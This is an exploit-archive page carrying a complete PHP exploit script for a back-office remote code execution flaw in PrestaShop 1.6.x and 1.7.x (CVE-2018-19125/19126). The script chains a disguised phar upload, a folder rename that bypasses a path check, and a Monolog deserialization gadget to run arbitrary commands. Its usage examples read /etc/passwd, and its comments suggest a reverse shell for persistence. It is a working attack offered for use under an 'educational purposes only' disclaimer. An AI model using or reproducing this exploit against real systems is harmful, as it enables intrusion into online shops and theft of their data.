exploit the possibilities

PrestaShop 1.6.x / 1.7.x Remote Code Execution

PrestaShop 1.6.x / 1.7.x Remote Code Execution
Posted Dec 12, 2018
Authored by farisv

PrestaShop versions 1.6.x and 1.7.x suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2018-19125, CVE-2018-19126
MD5 | a0976f0faba673405394f6f235ada8b2

PrestaShop 1.6.x / 1.7.x Remote Code Execution

Change Mirror Download
<?php
/**
*
* PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution
* See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.
*
* Chaining multiple vulnerabilities to trigger deserialization via phar.
*
* Date:
* December 1st, 2018
*
* Author:
* farisv
*
* Vendor Homepage:
* https://www.prestashop.com/
*
* Vulnerable Package Link:
* https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip
*
* CVE :
* - CVE-2018-19126
* - CVE-2018-19125
*
* Prerequisite:
* - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.
* - Back Office account (logistician, translator, salesman, etc.).
*
* Usage:
* php exploit.php back-office-url email password func param
*
* Example:
* php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123
* system 'cat /etc/passwd'
*
* Note:
* Note that the upload directory will be renamed and you can't upload the
* malicious phar file again if the folder name is not reverted. You might want
* to execute reverse shell to gain persistence RCE or include the command to
* rename the folder again in your payload (you need to know the path to the
* upload directory).
*
* FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
* THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
*
*/

namespace PrestaShopRCE {

class Exploit {
private $url;
private $email;
private $passwd;
private $cmd;
private $func;
private $param;

public function __construct($url, $email, $passwd, $func, $param) {
$this->url = $url;
$this->email = $email;
$this->passwd = $passwd;
$this->func = $func;
$this->param = $param;
}

private function post($path, $data, $cookie) {
$curl_handle = curl_init();

$options = array(
CURLOPT_URL => $this->url . $path,
CURLOPT_HEADER => true,
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => $data,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_COOKIE => $cookie
);

curl_setopt_array($curl_handle, $options);
$raw = curl_exec($curl_handle);
curl_close($curl_handle);

return $raw;
}

private function fetch_cookie($raw) {
$header = "Set-Cookie: ";
$cookie_header_start = strpos($raw, $header);
$sliced_part = substr($raw, $cookie_header_start + strlen($header));
$cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));
return $cookie;
}

public function run() {

// Login and get PrestaShop cookie
$data = array(
'email' => $this->email,
'passwd' => $this->passwd,
'submitLogin' => '1',
'controller' => 'AdminLogin',
'ajax' => '1'
);
$cookie = "";
$raw = $this->post('/', $data, $cookie);
$prestashop_cookie = $this->fetch_cookie($raw);

// Get FileManager cookie
$data = array();
$cookie = $prestashop_cookie;
$raw = $this->post('/filemanager/dialog.php', $data, $cookie);
$filemanager_cookie = $this->fetch_cookie($raw);

// Craft deserialization gadget
$gadget = new \Monolog\Handler\SyslogUdpHandler(
new \Monolog\Handler\BufferHandler(
['current', $this->func],
[$this->param, 'level' => null]
)
);

// Craft malicious phar file
$phar = new \Phar('phar.phar');
$phar->startBuffering();
$phar->addFromString('test', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($gadget);
$phar->stopBuffering();

// Change the extension
rename('phar.phar', 'phar.pdf');

// Cookie for next requests
$cookie = "$prestashop_cookie; $filemanager_cookie";

// Upload phar.pdf
$curl_file = new \CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');
$data = array(
'file' => $curl_file
);
$raw = $this->post('/filemanager/upload.php', $data, $cookie);

// Rename image directory to bypass realpath() check
$data = array(
'name' => 'renamed'
);
$raw = $this->post(
'/filemanager/execute.php?action=rename_folder',
$data,
$cookie
);

// Trigger deserialization
// The '/img/cms/' substring is important to bypass string check
$data = array(
'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'
);
$raw = $this->post(
'/filemanager/ajax_calls.php?action=image_size',
$data,
$cookie
);

// Display the raw result
print $raw;

}
}

}

/*
* Based on
* https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/
*/
namespace Monolog\Handler {

class SyslogUdpHandler {
protected $socket;

function __construct($param) {
$this->socket = $param;
}
}

class BufferHandler {
protected $handler;
protected $bufferSize = -1;
protected $buffer;
protected $level = null;
protected $initialized = true;
protected $bufferLimit = -1;
protected $processors;

function __construct($methods, $command) {
$this->processors = $methods;
$this->buffer = [$command];
$this->handler = clone $this;
}
}

}

namespace {

if (count($argv) != 6) {
$hint = "Usage:\n php $argv[0] back-office-url email password func param\n\n";
$hint .= "Example:\n php $argv[0] http://127.0.0.1/admin-dev/ ";
$hint .= "salesman@shop.com 54l35m4n123 system 'uname -a'";
die($hint);
}

if (!extension_loaded('curl')) {
die('Need php-curl');
}

$url = $argv[1];
$email = $argv[2];
$passwd = $argv[3];
$func = $argv[4];
$param = $argv[5];

$exploit = new PrestaShopRCE\Exploit($url, $email, $passwd, $func, $param);
$exploit->run();

}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close